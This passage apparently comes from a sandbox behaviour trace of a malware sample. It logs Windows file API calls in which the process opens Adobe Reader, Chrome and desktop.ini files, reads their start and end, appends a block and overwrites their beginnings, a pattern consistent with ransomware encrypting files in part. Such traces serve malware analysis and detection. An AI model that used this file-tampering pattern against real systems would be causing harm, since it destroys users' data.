(hMutex=0x168) returned 1 [0117.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KOREAN.TXT", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0117.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KOREAN.TXT", cchWideChar=10, lpMultiByteStr=0x1f7340c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KOREAN.TXT", lpUsedDefaultChar=0x0) returned 10 [0117.796] ReadFile (in: hFile=0x1fc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2e9f278*=0x8000, lpOverlapped=0x0) returned 1 [0117.818] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x581cf [0117.818] ReadFile (in: hFile=0x1fc, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0117.845] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x581cf [0117.846] WriteFile (in: hFile=0x1fc, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0117.846] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0117.846] WriteFile (in: hFile=0x1fc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2e9f28c*=0x8000, lpOverlapped=0x0) returned 1 [0117.846] CloseHandle (hObject=0x1fc) returned 1 [0117.847] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1251.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1251.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0117.847] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0117.848] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x251f [0117.848] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0117.848] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0117.848] ReleaseMutex (hMutex=0x168) returned 1 [0117.848] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CP1251.TXT", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0117.848] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CP1251.TXT", cchWideChar=10, lpMultiByteStr=0x1f733cc, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CP1251.TXT", lpUsedDefaultChar=0x0) returned 10 [0117.848] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0118.220] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x151f [0118.220] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0118.261] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x151f [0118.261] WriteFile (in: hFile=0x1fc, lpBuffer=0x2693be8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2693be8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0118.261] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0118.261] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0118.261] CloseHandle (hObject=0x1fc) returned 1 [0118.262] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP874.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp874.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0118.263] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0118.263] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x2221 [0118.263] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0118.263] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.264] ReleaseMutex (hMutex=0x168) returned 1 [0118.264] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CP874.TXT", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0118.264] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CP874.TXT", cchWideChar=9, lpMultiByteStr=0x1f7340c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CP874.TXT", lpUsedDefaultChar=0x0) returned 9 [0118.264] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0118.292] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1221 [0118.292] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0118.307] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1221 [0118.308] WriteFile (in: hFile=0x1fc, lpBuffer=0x25ad0a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad0a8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0118.308] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0118.308] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0118.308] CloseHandle (hObject=0x1fc) returned 1 [0118.308] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1030.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1030.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0118.309] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1030.mst", nBufferLength=0x104, lpBuffer=0x2e9f694, lpFilePart=0x2e9f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1030.mst", lpFilePart=0x2e9f690*="1030.mst") returned 0x64 [0118.309] GetLastError () returned 0x5 [0118.309] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2e9f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˩폈H˩퐔H˩L˩가Ƿ\x01") returned 0x13 [0118.309] LocalFree (hMem=0x69e2b0) returned 0x0 [0118.309] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2e9d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0118.309] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2e9f894) [0118.309] RtlUnwind (TargetFrame=0x2e9f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0118.310] RtlUnwind (TargetFrame=0x2e9f920, TargetIp=0x407184, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0118.310] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1030.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1030.mst")) returned 0x21 [0118.310] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1041.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1041.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0118.310] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1041.mst", nBufferLength=0x104, lpBuffer=0x2e9f694, lpFilePart=0x2e9f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1041.mst", lpFilePart=0x2e9f690*="1041.mst") returned 0x64 [0118.310] GetLastError () returned 0x5 [0118.310] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2e9f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˩폈H˩퐔H˩L˩가Ƿ\x01") returned 0x13 [0118.310] LocalFree (hMem=0x69e2b0) returned 0x0 [0118.310] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2e9d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0118.310] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2e9f894) [0118.311] RtlUnwind (TargetFrame=0x2e9f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0118.311] RtlUnwind (TargetFrame=0x2e9f920, TargetIp=0x407184, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0118.311] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1041.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1041.mst")) returned 0x21 [0118.311] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1050.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1050.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0118.311] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1050.mst", nBufferLength=0x104, lpBuffer=0x2e9f694, lpFilePart=0x2e9f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1050.mst", lpFilePart=0x2e9f690*="1050.mst") returned 0x64 [0118.311] GetLastError () returned 0x5 [0118.311] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2e9f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˩폈H˩퐔H˩L˩가Ƿ\x01") returned 0x13 [0118.312] LocalFree (hMem=0x69e2b0) returned 0x0 [0118.312] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2e9d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0118.312] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2e9f894) [0118.312] RtlUnwind (TargetFrame=0x2e9f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0118.312] RtlUnwind (TargetFrame=0x2e9f920, TargetIp=0x407184, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0118.313] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1050.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1050.mst")) returned 0x21 [0118.313] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\ABCPY.INI" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\abcpy.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0118.313] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\ABCPY.INI", nBufferLength=0x104, lpBuffer=0x2e9f694, lpFilePart=0x2e9f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\ABCPY.INI", lpFilePart=0x2e9f690*="ABCPY.INI") returned 0x65 [0118.313] GetLastError () returned 0x5 [0118.313] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2e9f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˩폈H˩퐔H˩L˩가Ƿ\x01") returned 0x13 [0118.313] LocalFree (hMem=0x69e2b0) returned 0x0 [0118.313] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2e9d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0118.313] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2e9f894) [0118.313] RtlUnwind (TargetFrame=0x2e9f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0118.314] RtlUnwind (TargetFrame=0x2e9f920, TargetIp=0x407184, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0118.314] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\ABCPY.INI" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\abcpy.ini")) returned 0x21 [0118.314] CreateFileW (lpFileName="C:\\Program Files (x86)\\desktop.ini" (normalized: "c:\\program files (x86)\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0118.315] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0118.315] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xae [0118.315] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0118.315] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.315] ReleaseMutex (hMutex=0x168) returned 1 [0118.315] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0118.315] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f735cc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0118.315] ReadFile (in: hFile=0x1fc, lpBuffer=0x1f399d8, nNumberOfBytesToRead=0xae, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f399d8*, lpNumberOfBytesRead=0x2e9f2bc*=0xae, lpOverlapped=0x0) returned 1 [0118.316] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0118.316] WriteFile (in: hFile=0x1fc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x636, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2e9f2d0*=0x636, lpOverlapped=0x0) returned 1 [0118.317] CloseHandle (hObject=0x1fc) returned 1 [0118.317] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\drive.crx" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\default_apps\\drive.crx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0118.321] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0118.321] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x63d9 [0118.321] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0118.321] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.321] ReleaseMutex (hMutex=0x168) returned 1 [0118.321] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="drive.crx", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0118.321] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="drive.crx", cchWideChar=9, lpMultiByteStr=0x1f735cc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="drive.crx", lpUsedDefaultChar=0x0) returned 9 [0118.321] ReadFile (in: hFile=0x1fc, lpBuffer=0x25ad0a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25ad0a8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0118.330] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x53d9 [0118.330] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e943a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0118.346] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x53d9 [0118.346] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ea7b88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea7b88*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0118.346] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0118.346] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e943a8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0118.346] CloseHandle (hObject=0x1fc) returned 1 [0118.347] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\am.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\am.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0118.347] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0118.348] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x6f4e0 [0118.348] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0118.348] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.348] ReleaseMutex (hMutex=0x168) returned 1 [0118.348] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="am.pak", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0118.348] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="am.pak", cchWideChar=6, lpMultiByteStr=0x1f7ac9c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="am.pak", lpUsedDefaultChar=0x0) returned 6 [0118.348] ReadFile (in: hFile=0x1fc, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x2e9f278*=0x8000, lpOverlapped=0x0) returned 1 [0118.356] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x6e4e0 [0118.356] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0118.360] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x6e4e0 [0118.360] WriteFile (in: hFile=0x1fc, lpBuffer=0x2693be8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2693be8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 